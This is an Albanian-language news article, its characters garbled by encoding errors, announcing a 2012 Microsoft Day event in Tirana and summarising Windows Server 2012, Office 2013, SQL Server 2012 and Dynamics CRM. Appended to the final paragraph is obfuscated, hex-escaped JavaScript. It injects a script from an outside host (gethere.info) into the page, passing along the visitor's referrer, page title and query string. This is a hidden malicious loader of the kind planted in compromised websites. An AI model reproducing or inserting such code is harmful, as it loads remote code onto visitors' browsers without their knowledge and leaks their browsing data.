largea_microsoft-day1352288567

Microsoft Albania njofton mbajtjen e njA� eventi mbi produktet mA� tA� reja

Microsoft Albania, dega zyrtare e gjigantit softuerik mbarA�botA�ror nA� ShqipA�ri, do tA� mbajA� nA� TiranA� njA� event ku do tA� prezantohen produktet mA� tA� reja tA� kompanisA�.

a�?Microsoft Daya�?A�shtA� eventi mA� i madh i teknologjisA� sA� informacionit i mbajtur nA� ShqipA�ri. Tradicionalisht, ai mbledh sA� bashku profesionistA� tA� IT-sA�, zhvillues, arkitektA� softuerikA� dhe menaxherA� tA� biznesit tA� IT-sA�. a�?Microsoft Daya�? do tA� mbahet ditA�n e mA�rkurA�, 14 nA�ntor 2012 nA� Hotel Sheraton tek Salla Illyria 1&2.

Eventi do tA� fokusohet nA� disa pika kryesore. NjA� prej tyre do tA� jenA� pA�rfitimet e Microsoft Flexible Workstyle. Duke qenA� se mA�nyra se si njerA�zit punojnA� ka ndryshuar dukshA�m, duke u orientuar dhe drejtuar nga bota e teknologjisA�, lind nevoja e implementimit tA� njA� sistemi qA� ndihmon nA� lehtA�simin e menaxhimit tA� punA�s.

Microsoft Flexible Workstyle, pA�rmes teknologjive tA� saj shtesA�, synon tA� ndihmojA� njerA�zit tA� realizojnA� nA� mA�nyrA� mA� efikase punA�n e tyre, kudo qA� ndodhen, kurdo qA� kanA� nevojA�, pavarA�sisht nga lloji i pajisjeve qA� pA�rdorin.

NA� kA�tA� event nuk mund tA� mungojA� edhe prezantimi i Office 2013

Windows Server 2012 do tA� jetA� njA� tjetA�r pikA� e rA�ndA�sishme e kA�tij eventi. Mjetet e tij ndihmojnA� konsumatorA�t tA� realizojnA� kalimin nA� mjediset hibride duke vazhduar ofrimin e shA�rbimeve dhe plotA�simin e kA�rkesave tA� tregut.

Windows Server 2012 me Hyper-V A�shtA� njA� platformA� virtuale qA� i ka ndihmuar organizatat e tA� gjitha madhA�sive tA� gjejnA� mA�nyra pA�r tA� reduktuar kostot dhe pA�r tA� rritur efektivitetin operacional.

Sigurisht qA� nA� kA�tA� event nuk mund tA� mungonte edhe prezantimi i Office 2013. Suita, e cila pritet qA� jetA� e ardhmja e produktivitetit, ndA�rthur e-mailin, dokumentet e rA�ndA�sishme, kontaktet, kalendarin dhe opsionet e personalizuara pothuajse nA� A�do pajisje tjetA�r, pA�rfshi edhe ato me prekje.

Po ashtu do tA� flitet edhe mbi SQL Server 2012 dhe Microsoft DynamicsA� CRM. NA� versionin e ri tA� 2012-s, SQL Server A�shtA� gati pA�r ta��u integruar nA� cloud. Ajo A�shtA� ndA�rtuar pA�r organizata qA� kA�rkojnA� tA� mbrojnA� dhe shpA�rndajnA� nA� mA�nyrA� efikase tA� dhA�nat e tyre pA�rmes desktopA�ve, pajisjeve, qendrave tA� tA� dhA�nave si dhe cloud-it.

Dynamics CRM, nga ana tjetA�r, A�shtA� njA� softuer biznesi, i cili i ndihmon punonjA�sit e kompanisA� nA� menaxhimin e zgjidhjeve. Ai mund tA� pA�rdoret nA� automatizimin e shitjeve, marketingut, menaxhimit tA� shA�rbimeve si dhe gjithA� proceseve tA� tjera menaxheriale tA� biznesit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}